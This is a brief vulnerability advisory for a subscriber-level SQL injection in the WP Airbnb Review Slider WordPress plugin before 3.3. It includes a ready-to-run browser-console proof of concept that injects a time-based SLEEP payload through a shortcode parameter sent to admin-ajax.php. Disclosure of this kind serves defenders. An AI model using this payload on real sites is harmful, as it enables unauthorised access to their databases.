WP Airbnb Review Slider < 3.3 - Subscriber+ SQLi

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.

PoC

Run the following code in the browser console on any WP Admin page. fetch(‘/wp-admin/admin-ajax.php’, { method: ‘POST’, headers: new Headers({ ‘Content-Type’: ‘application/x-www-form-urlencoded’, }), body: ‘action=parse-media-shortcode&shortcode;=[wpairbnb_usetemplate tid=“1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)”]’ }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log(‘error’, error));